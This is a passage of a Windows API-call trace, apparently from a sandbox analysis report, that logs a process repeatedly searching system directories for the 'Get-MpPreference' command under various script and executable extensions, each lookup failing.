lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.379] GetLastError () returned 0x2 [0078.379] SetErrorMode (uMode=0x1) returned 0x1 [0078.379] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.MSC", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.379] GetLastError () returned 0x2 [0078.379] SetErrorMode (uMode=0x1) returned 0x1 [0078.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.379] GetLastError () returned 0x2 [0078.379] SetErrorMode (uMode=0x1) returned 0x1 [0078.379] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.379] GetLastError () returned 0x2 [0078.379] SetErrorMode (uMode=0x1) returned 0x1 [0078.382] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.382] GetLastError () returned 0x2 [0078.382] SetErrorMode (uMode=0x1) returned 0x1 [0078.382] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.ps1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.382] GetLastError () returned 0x2 [0078.382] SetErrorMode (uMode=0x1) returned 0x1 [0078.382] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.382] GetLastError () returned 0x2 [0078.382] SetErrorMode (uMode=0x1) returned 0x1 [0078.382] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.psm1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.383] GetLastError () returned 0x2 [0078.383] SetErrorMode (uMode=0x1) returned 0x1 [0078.383] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.383] GetLastError () returned 0x2 [0078.383] SetErrorMode (uMode=0x1) returned 0x1 [0078.383] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.psd1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.383] GetLastError () returned 0x2 [0078.383] SetErrorMode (uMode=0x1) returned 0x1 [0078.383] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.383] GetLastError () returned 0x2 [0078.383] SetErrorMode (uMode=0x1) returned 0x1 [0078.384] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.COM", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.384] GetLastError () returned 0x2 [0078.384] SetErrorMode (uMode=0x1) returned 0x1 [0078.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.384] GetLastError () returned 0x2 [0078.384] SetErrorMode (uMode=0x1) returned 0x1 [0078.384] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.EXE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.384] GetLastError () returned 0x2 [0078.384] SetErrorMode (uMode=0x1) returned 0x1 [0078.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.384] GetLastError () returned 0x2 [0078.384] SetErrorMode (uMode=0x1) returned 0x1 [0078.385] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.BAT", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.385] GetLastError () returned 0x2 [0078.385] SetErrorMode (uMode=0x1) returned 0x1 [0078.385] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.385] GetLastError () returned 0x2 [0078.385] SetErrorMode (uMode=0x1) returned 0x1 [0078.385] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.CMD", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.385] GetLastError () returned 0x2 [0078.385] SetErrorMode (uMode=0x1) returned 0x1 [0078.385] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.385] GetLastError () returned 0x2 [0078.385] SetErrorMode (uMode=0x1) returned 0x1 [0078.386] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.VBS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.386] GetLastError () returned 0x2 [0078.386] SetErrorMode (uMode=0x1) returned 0x1 [0078.386] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.386] GetLastError () returned 0x2 [0078.386] SetErrorMode (uMode=0x1) returned 0x1 [0078.386] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.VBE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.386] GetLastError () returned 0x2 [0078.386] SetErrorMode (uMode=0x1) returned 0x1 [0078.386] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.386] GetLastError () returned 0x2 [0078.386] SetErrorMode (uMode=0x1) returned 0x1 [0078.387] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.JS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.387] GetLastError () returned 0x2 [0078.387] SetErrorMode (uMode=0x1) returned 0x1 [0078.387] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.387] GetLastError () returned 0x2 [0078.387] SetErrorMode (uMode=0x1) returned 0x1 [0078.387] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.JSE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.387] GetLastError () returned 0x2 [0078.387] SetErrorMode (uMode=0x1) returned 0x1 [0078.387] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.387] GetLastError () returned 0x2 [0078.387] SetErrorMode (uMode=0x1) returned 0x1 [0078.388] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.WSF", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.388] GetLastError () returned 0x2 [0078.388] SetErrorMode (uMode=0x1) returned 0x1 [0078.388] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.388] GetLastError () returned 0x2 [0078.388] SetErrorMode (uMode=0x1) returned 0x1 [0078.388] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.WSH", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.388] GetLastError () returned 0x2 [0078.388] SetErrorMode (uMode=0x1) returned 0x1 [0078.388] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.388] GetLastError () returned 0x2 [0078.388] SetErrorMode (uMode=0x1) returned 0x1 [0078.389] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.MSC", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.389] GetLastError () returned 0x2 [0078.389] SetErrorMode (uMode=0x1) returned 0x1 [0078.389] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0078.389] GetLastError () returned 0x2 [0078.389] SetErrorMode (uMode=0x1) returned 0x1 [0078.389] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.389] GetLastError () returned 0x2 [0078.389] SetErrorMode (uMode=0x1) returned 0x1 [0078.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.389] GetLastError () returned 0x2 [0078.389] SetErrorMode (uMode=0x1) returned 0x1 [0078.390] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.ps1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.390] GetLastError () returned 0x2 [0078.390] SetErrorMode (uMode=0x1) returned 0x1 [0078.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.390] GetLastError () returned 0x2 [0078.390] SetErrorMode (uMode=0x1) returned 0x1 [0078.390] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.psm1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.390] GetLastError () returned 0x2 [0078.390] SetErrorMode (uMode=0x1) returned 0x1 [0078.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.390] GetLastError () returned 0x2 [0078.390] SetErrorMode (uMode=0x1) returned 0x1 [0078.391] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.psd1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.391] GetLastError () returned 0x2 [0078.391] SetErrorMode (uMode=0x1) returned 0x1 [0078.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.391] GetLastError () returned 0x2 [0078.391] SetErrorMode (uMode=0x1) returned 0x1 [0078.391] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.COM", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.391] GetLastError () returned 0x2 [0078.391] SetErrorMode (uMode=0x1) returned 0x1 [0078.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.391] GetLastError () returned 0x2 [0078.391] SetErrorMode (uMode=0x1) returned 0x1 [0078.392] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.EXE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.392] GetLastError () returned 0x2 [0078.392] SetErrorMode (uMode=0x1) returned 0x1 [0078.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.392] GetLastError () returned 0x2 [0078.392] SetErrorMode (uMode=0x1) returned 0x1 [0078.392] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.BAT", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.392] GetLastError () returned 0x2 [0078.392] SetErrorMode (uMode=0x1) returned 0x1 [0078.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.392] GetLastError () returned 0x2 [0078.393] SetErrorMode (uMode=0x1) returned 0x1 [0078.393] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.CMD", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.393] GetLastError () returned 0x2 [0078.393] SetErrorMode (uMode=0x1) returned 0x1 [0078.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.393] GetLastError () returned 0x2 [0078.393] SetErrorMode (uMode=0x1) returned 0x1 [0078.393] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.VBS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.393] GetLastError () returned 0x2 [0078.393] SetErrorMode (uMode=0x1) returned 0x1 [0078.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.393] GetLastError () returned 0x2 [0078.394] SetErrorMode (uMode=0x1) returned 0x1 [0078.394] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.VBE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.394] GetLastError () returned 0x2 [0078.394] SetErrorMode (uMode=0x1) returned 0x1 [0078.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.394] GetLastError () returned 0x2 [0078.394] SetErrorMode (uMode=0x1) returned 0x1 [0078.394] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.JS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.394] GetLastError () returned 0x2 [0078.394] SetErrorMode (uMode=0x1) returned 0x1 [0078.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.394] GetLastError () returned 0x2 [0078.395] SetErrorMode (uMode=0x1) returned 0x1 [0078.395] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.JSE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.395] GetLastError () returned 0x2 [0078.395] SetErrorMode (uMode=0x1) returned 0x1 [0078.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.395] GetLastError () returned 0x2 [0078.395] SetErrorMode (uMode=0x1) returned 0x1 [0078.395] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.WSF", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff 